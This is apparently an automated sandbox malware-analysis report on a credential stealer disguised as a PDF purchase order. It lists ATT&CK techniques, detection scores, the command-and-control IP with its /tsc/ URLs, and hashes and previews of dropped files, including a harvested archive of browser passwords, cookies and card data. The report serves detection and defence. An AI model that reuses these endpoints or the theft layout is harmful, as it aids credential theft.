                    Valid AccountsWindows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData Obfuscation2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection111Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothIngress Tool Transfer11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information13Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationEncrypted Channel2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing21NTDSSystem Information Discovery48Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery3SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncProcess Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    New Order PO2193570O1.pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\freebl3.dll0%MetadefenderBrowse
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll3%MetadefenderBrowse
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%MetadefenderBrowse
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%MetadefenderBrowse
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%MetadefenderBrowse
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\sqlite3.dll0%MetadefenderBrowse
                    C:\ProgramData\sqlite3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%MetadefenderBrowse
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dll0%ReversingLabs

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.2.New Order PO2193570O1.pdf.exe.9830000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                    1.1.New Order PO2193570O1.pdf.exe.400000.0.unpack100%AviraHEUR/AGEN.1136795Download File
                    0.0.New Order PO2193570O1.pdf.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
                    0.2.New Order PO2193570O1.pdf.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
                    1.0.New Order PO2193570O1.pdf.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
                    1.2.New Order PO2193570O1.pdf.exe.400000.0.unpack100%AviraHEUR/AGEN.1136795Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://51.222.56.151/tsc//1.jpg1%VirustotalBrowse
                    http://51.222.56.151/tsc//1.jpg0%Avira URL Cloudsafe
                    http://51.222.56.151/tsc//6.jpg1%VirustotalBrowse
                    http://51.222.56.151/tsc//6.jpg0%Avira URL Cloudsafe
                    http://51.222.56.151/tsc//main.php2%VirustotalBrowse
                    http://51.222.56.151/tsc//main.php0%Avira URL Cloudsafe
                    http://51.222.56.151/tsc//4.jpg1%VirustotalBrowse
                    http://51.222.56.151/tsc//4.jpg0%Avira URL Cloudsafe
                    http://ocsp.thawte.com00%URL Reputationsafe
                    http://ocsp.thawte.com00%URL Reputationsafe
                    http://ocsp.thawte.com00%URL Reputationsafe
                    http://ocsp.thawte.com00%URL Reputationsafe
                    http://www.mozilla.com00%URL Reputationsafe
                    http://www.mozilla.com00%URL Reputationsafe
                    http://www.mozilla.com00%URL Reputationsafe
                    http://www.mozilla.com00%URL Reputationsafe
                    http://51.222.56.151/tsc//7.jpg0%Avira URL Cloudsafe
                    http://51.222.56.151/tsc//2.jpg0%Avira URL Cloudsafe
                    http://51.222.56.151/tsc//3.jpg0%Avira URL Cloudsafe
                    http://51.222.56.151/tsc//5.jpg0%Avira URL Cloudsafe
                    http://51.222.56.151/tsc/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://51.222.56.151/tsc//1.jpgtrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc//6.jpgtrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc//main.phptrue
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc//4.jpgtrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc//7.jpgtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc//2.jpgtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc//3.jpgtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc//5.jpgtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://51.222.56.151/tsc/true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ac.ecosia.org/autocomplete?q=temp.1.drfalse
                      		high
                      https://duckduckgo.com/chrome_newtabtemp.1.drfalse
                        		high
                        http://www.mozilla.com/en-US/blocklist/mozglue.dll.1.drfalse
                          		high
                          https://duckduckgo.com/ac/?q=temp.1.drfalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorNew Order PO2193570O1.pdf.exefalse
                              		high
                              http://crl.thawte.com/ThawteTimestampingCA.crl0New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drfalse
                                		high
                                http://ocsp.thawte.com0New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drtrue
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.mozilla.com0New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.drtrue
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabSQLitetemp.1.drfalse
                                  		high
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=temp.1.drfalse
                                    		high
                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchtemp.1.drfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorErrorNew Order PO2193570O1.pdf.exefalse
                                        		high
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=temp.1.drfalse
                                          		high
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=temp.1.drfalse
                                            		high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            51.222.56.151
                                            		unknownFrance
                                            		16276OVHFRtrue

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:433019
                                            Start date:11.06.2021
                                            Start time:06:31:11
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 5m 3s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:New Order PO2193570O1.pdf.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:7
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@8/16@0/1
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 95% (good quality ratio 91.5%)
                                            • Quality average: 80.9%
                                            • Quality standard deviation: 27.1%
                                            HCA Information:
                                            • Successful, ratio: 95%
                                            • Number of executed functions: 144
                                            • Number of non-executed functions: 85
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            • Stop behavior analysis, all processes terminated
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, svchost.exe
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            51.222.56.151New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                            • 51.222.56.151/tsc/

                                            Domains

                                            No context

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            OVHFRRequest For Quote.exeGet hashmaliciousBrowse
                                            • 158.69.138.23
                                            payload.htmlGet hashmaliciousBrowse
                                            • 145.239.131.60
                                            6VYNUalwUt.exeGet hashmaliciousBrowse
                                            • 178.33.222.241
                                            New Inquiry.exeGet hashmaliciousBrowse
                                            • 158.69.138.23
                                            New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                            • 51.222.56.151
                                            Requestforquote.exeGet hashmaliciousBrowse
                                            • 158.69.138.23
                                            SecuriteInfo.com.Trojan.PackedNET.721.2973.exeGet hashmaliciousBrowse
                                            • 149.202.83.171
                                            SecuriteInfo.com.Trojan.PackedNET.831.4134.exeGet hashmaliciousBrowse
                                            • 51.210.201.99
                                            ORDER-6010.pdf.exeGet hashmaliciousBrowse
                                            • 178.33.222.241
                                            U03c2doc.exeGet hashmaliciousBrowse
                                            • 5.135.185.231
                                            PO.xlsxGet hashmaliciousBrowse
                                            • 51.210.201.99
                                            ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                            • 79.137.68.187
                                            2iM58wdcXq.exeGet hashmaliciousBrowse
                                            • 79.137.109.121
                                            HT.xlsxGet hashmaliciousBrowse
                                            • 79.137.109.121
                                            DY2Cl8KZth.apkGet hashmaliciousBrowse
                                            • 164.132.160.181
                                            953DD19700177BEAF848E510418DB83C8481CE466819C.exeGet hashmaliciousBrowse
                                            • 178.33.93.88
                                            #Ud83d#Udda8northerntrust.hscni.net 692233150-queue-7828.htmGet hashmaliciousBrowse
                                            • 145.239.131.55
                                            sample.exeGet hashmaliciousBrowse
                                            • 144.217.77.41
                                            banUwVSwBY.xlsxGet hashmaliciousBrowse
                                            • 51.89.115.124
                                            banUwVSwBY.xlsxGet hashmaliciousBrowse
                                            • 51.89.115.124

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            C:\ProgramData\freebl3.dllbL6FwQU4K5.exeGet hashmaliciousBrowse
                                              3JDjILxXaA.exeGet hashmaliciousBrowse
                                                IMG061730811.exeGet hashmaliciousBrowse
                                                  ugKceVSdWJ2FOWT.exeGet hashmaliciousBrowse
                                                    New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                      wmuHclz87ynxvB8.exeGet hashmaliciousBrowse
                                                        Yl6482CO6U.exeGet hashmaliciousBrowse
                                                          ZmZvKByoew.exeGet hashmaliciousBrowse
                                                            WUqkYlTJ16.exeGet hashmaliciousBrowse
                                                              y3I4XEdM4V.exeGet hashmaliciousBrowse
                                                                LVh23zF9x9.exeGet hashmaliciousBrowse
                                                                  48s9bA7Stk.exeGet hashmaliciousBrowse
                                                                    pd5S1Fiscq.exeGet hashmaliciousBrowse
                                                                      9E7YOr0kp1.exeGet hashmaliciousBrowse
                                                                        IMG05773060.exeGet hashmaliciousBrowse
                                                                          2-2.exeGet hashmaliciousBrowse
                                                                            3-1.exeGet hashmaliciousBrowse
                                                                              2-3.exeGet hashmaliciousBrowse
                                                                                3-2.exeGet hashmaliciousBrowse
                                                                                  3-3.exeGet hashmaliciousBrowse
                                                                                    C:\ProgramData\mozglue.dllbL6FwQU4K5.exeGet hashmaliciousBrowse
                                                                                      3JDjILxXaA.exeGet hashmaliciousBrowse
                                                                                        IMG061730811.exeGet hashmaliciousBrowse
                                                                                          ugKceVSdWJ2FOWT.exeGet hashmaliciousBrowse
                                                                                            New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                                              wmuHclz87ynxvB8.exeGet hashmaliciousBrowse
                                                                                                Yl6482CO6U.exeGet hashmaliciousBrowse
                                                                                                  ZmZvKByoew.exeGet hashmaliciousBrowse
                                                                                                    WUqkYlTJ16.exeGet hashmaliciousBrowse
                                                                                                      y3I4XEdM4V.exeGet hashmaliciousBrowse
                                                                                                        LVh23zF9x9.exeGet hashmaliciousBrowse
                                                                                                          48s9bA7Stk.exeGet hashmaliciousBrowse
                                                                                                            pd5S1Fiscq.exeGet hashmaliciousBrowse
                                                                                                              9E7YOr0kp1.exeGet hashmaliciousBrowse
                                                                                                                IMG05773060.exeGet hashmaliciousBrowse
                                                                                                                  2-2.exeGet hashmaliciousBrowse
                                                                                                                    3-1.exeGet hashmaliciousBrowse
                                                                                                                      2-3.exeGet hashmaliciousBrowse
                                                                                                                        3-2.exeGet hashmaliciousBrowse
                                                                                                                          3-3.exeGet hashmaliciousBrowse

                                                                                                                            Created / dropped Files

                                                                                                                            C:\ProgramData\300337377349991\_3003373773.zip
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):88412
                                                                                                                            Entropy (8bit):7.991458609786443
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:1536:xnCniwspjRD8h8YFiR4ckmoCQXo7ob/QSm8diDsecE0QcSCqWSyY8mYMmiBhF:xndD8C3R4crlUb/HCAztUYMdB7
                                                                                                                            MD5:0B1B8E049B8627E9D778A6590F97391F
                                                                                                                            SHA1:477CCD7E0C625783C3C3392CFBE5B1F13A3AA0ED
                                                                                                                            SHA-256:C8D8B564518E93C9D66A8CDB619689B40DD0FB4ECC14B64CCE80CD1B8F69708C
                                                                                                                            SHA-512:2318476530A473092A4E8A09392349D2A28DC1F2A348688F124183E920FB1780461A21ACA5B96F32F082B6ED0746EAD9E0213048B430367F24CD5A2E3280E5FE
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: PK.........l.R............"...autofill/Google Chrome_Default.txtUT....e.`.e.`.e.`..PK.........l.R............"...autofill/Google Chrome_Default.txtUT....e.`.e.`.e.`PK.........l.R................cc/Google Chrome_Default.txtUT....e.`.e.`.e.`..PK.........l.R................cc/Google Chrome_Default.txtUT....e.`.e.`.e.`PK.........l.R............!...cookies/Google Chrome_Default.txtUT....e.`.e.`.e.`-..N.0...3&>..............B.ip.....O......e.gy....4g.....}v.!N.S.....,\[..|..5.V-...=.kBiJ?.+....]..}.h....y..Lt.Sb.:}.cS..KO.\.r..,.....M6.X... ....q9..3..v.@..z..71..t.Up..CS.~..g.mo.....PK.........l.R\~.l........!...cookies/Google Chrome_Default.txtUT....e.`.e.`.e.`PK.........l.R................outlook.txtUT....e.`.e.`.e.`..PK.........l.R................outlook.txtUT....e.`.e.`.e.`PK.........l.R................passwords.txtUT....e.`.e.`.e.`..PK.........l.R................passwords.txtUT....e.`.e.`.e.`PK.........l.R.........\......screenshot.jpgUT....e.`.e.`.e.`...T.].>.......N@...^..[
                                                                                                                            C:\ProgramData\300337377349991\cookies\Google Chrome_Default.txt
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):218
                                                                                                                            Entropy (8bit):5.787907296270898
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:PkopYjdSQHo3HWvmWogYmmYIkV0NAXhtfx:copYxzkYLmWV0Ghtp
                                                                                                                            MD5:550A7FD2AB480B2F537E0CB278AB1906
                                                                                                                            SHA1:3B890274F3CFC06C13E6CB6B048FFB6D5E80BB34
                                                                                                                            SHA-256:461A1E12872241809075955E29ED062E3283BF5BDA7B04DD59D35525D01076FA
                                                                                                                            SHA-512:215B8EF44D47B8FA461778F906A78E3853A55EA06B5620458CBC61E1B3BCB93B43E938A6C6F6DE632FC7B0AB61822465C19CB0F90B202877CF102AEDE7B8E346
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: .google.com.FALSE./.FALSE.1617282077.NID.204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34..
                                                                                                                            C:\ProgramData\300337377349991\screenshot.jpg
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):89308
                                                                                                                            Entropy (8bit):7.897288682040358
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:/HStNv3GovFSn0x0A++Ti6g0K3WcxD2CKghwk6GWvJCRfZIlCSQ55+ccJI4UV5ar:PmPGovmB+u91xD252tfWvJQfZIY55+c2
                                                                                                                            MD5:436B3AF1A1B8B3B6D98DAB3D29A701F4
                                                                                                                            SHA1:BC538C041224995F5D621C8F4F3C5B2FB0075B7C
                                                                                                                            SHA-256:F19B26D3C45BC35D9B9A01B778C15095B93DC980E80502F719910DD323DC3403
                                                                                                                            SHA-512:707098E1EED9A9A98226BE7382B1F8C3D05A89D01A40006EC920687E818C4CC3435F36B513E1B5174B57D59E8563557B5C1E88E04195229F8F1C179D49C39803
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: ......JFIF.....`.`.....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..1E..+....+R.....r..V.HY.m.q.......o...s<.-........RrHi6r.....i...#...36........J2lo#..9......E.i...%[.......XA8Ve.[....Uj...Ju%.!..4..4.W.C.z.x".uT..b.q..Z.....{VU....*..2........jv<.R.,|..?..........^...6..].. ...h....8.],M*..;.:s..EJ(..3.(....R.|/.N.....U..Ia......qS&....3.....P.?.}.?.!.?.P.C.}n..!.=.K.l.......'.....GK.g..T...Wj.s.^K$o....Q...5q...J.;
                                                                                                                            C:\ProgramData\300337377349991\system.txt
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9541
                                                                                                                            Entropy (8bit):5.116661378613306
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:7c6OBrVyZuauz0NpIKXDplsdM984uRAuzQ7uZUM9QYh1FcGEcLbLaAhy0/roqQck:7rOB5yZPewHranRAJhusXca4hLCPTNAY
                                                                                                                            MD5:B2DCAF5FAC5CD2489D57EE3EB5513B08
                                                                                                                            SHA1:1CFF3F3B42C5043914DCD078C207AF5813D1AC90
                                                                                                                            SHA-256:CB0A572AF7C23C5EE5FFE878D71EA355CAD0405713501194FD11F4454E49731C
                                                                                                                            SHA-512:8D0BF0FAE3E9C44FE95593EC80C6D6DFA4D5AC47BB6BA07741DBF94EA206C14FE2A4C6927E62D35C984302345D88707B76B8B2C7D69FECC72063CEE025BE48FF
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: System ---------------------------------------------------..Windows: Windows 10 Pro..Bit: x64..User: user..Computer Name: 066656..System Language: en-US..Machine ID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..Domain Name: Unknown..Workgroup: EEGWXUH..Keyboard Languages: English (United States)....Hardware -------------------------------------------------..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Logical processors: 4..Videocard: Microsoft Basic Display Adapter..Display: 1280x1024..RAM: 8191 MB..Laptop: No....Time -----------------------------------------------------..Local: 11/6/2021 6:32:4..Zone: UTC-8....Network --------------------------------------------------..IP: IP?..Country: Country?....Installed Softwrare --------------------------------------..Google Chrome 85.0.4183.121..Microsoft Office Professional Plus 2016 16.0.4266.1001..Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0..Microsoft Visual C++ 201
                                                                                                                            C:\ProgramData\300337377349991\temp
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):208896
                                                                                                                            Entropy (8bit):1.072681415124617
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:7woBI0olG4oN03r9lgbFB/1Vum73r9lgbFB/1Vumq:Z20olG4oNQraFB/JraFB/Q
                                                                                                                            MD5:6A54DC0222F70720485414672BD7E540
                                                                                                                            SHA1:C718575364E0ACB45E34A91113718174CB27A4AC
                                                                                                                            SHA-256:C7473C18CB501FB695FC0C1C10742B6B15A7CEB8813EF416EB3B192A07A91317
                                                                                                                            SHA-512:F12291FBF47B6EE7411318BC9F0175C2854B5FE2DD6C6246EA6E31173A8D3537B4A7F5FD88DAF98B87D04DD4A8DA3D61795D22234B93831C20DA26D6613F551D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            C:\ProgramData\freebl3.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):334288
                                                                                                                            Entropy (8bit):6.807000203861606
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                                                                            MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                                                                            SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                                                                            SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                                                                            SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: bL6FwQU4K5.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3JDjILxXaA.exe, Detection: malicious, Browse
                                                                                                                            • Filename: IMG061730811.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ugKceVSdWJ2FOWT.exe, Detection: malicious, Browse
                                                                                                                            • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                                            • Filename: wmuHclz87ynxvB8.exe, Detection: malicious, Browse
                                                                                                                            • Filename: Yl6482CO6U.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ZmZvKByoew.exe, Detection: malicious, Browse
                                                                                                                            • Filename: WUqkYlTJ16.exe, Detection: malicious, Browse
                                                                                                                            • Filename: y3I4XEdM4V.exe, Detection: malicious, Browse
                                                                                                                            • Filename: LVh23zF9x9.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 48s9bA7Stk.exe, Detection: malicious, Browse
                                                                                                                            • Filename: pd5S1Fiscq.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 9E7YOr0kp1.exe, Detection: malicious, Browse
                                                                                                                            • Filename: IMG05773060.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 2-2.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3-1.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 2-3.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3-2.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3-3.exe, Detection: malicious, Browse
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                            C:\ProgramData\mozglue.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):137168
                                                                                                                            Entropy (8bit):6.78390291752429
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                                                                            MD5:8F73C08A9660691143661BF7332C3C27
                                                                                                                            SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                                                                            SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                                                                            SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: bL6FwQU4K5.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3JDjILxXaA.exe, Detection: malicious, Browse
                                                                                                                            • Filename: IMG061730811.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ugKceVSdWJ2FOWT.exe, Detection: malicious, Browse
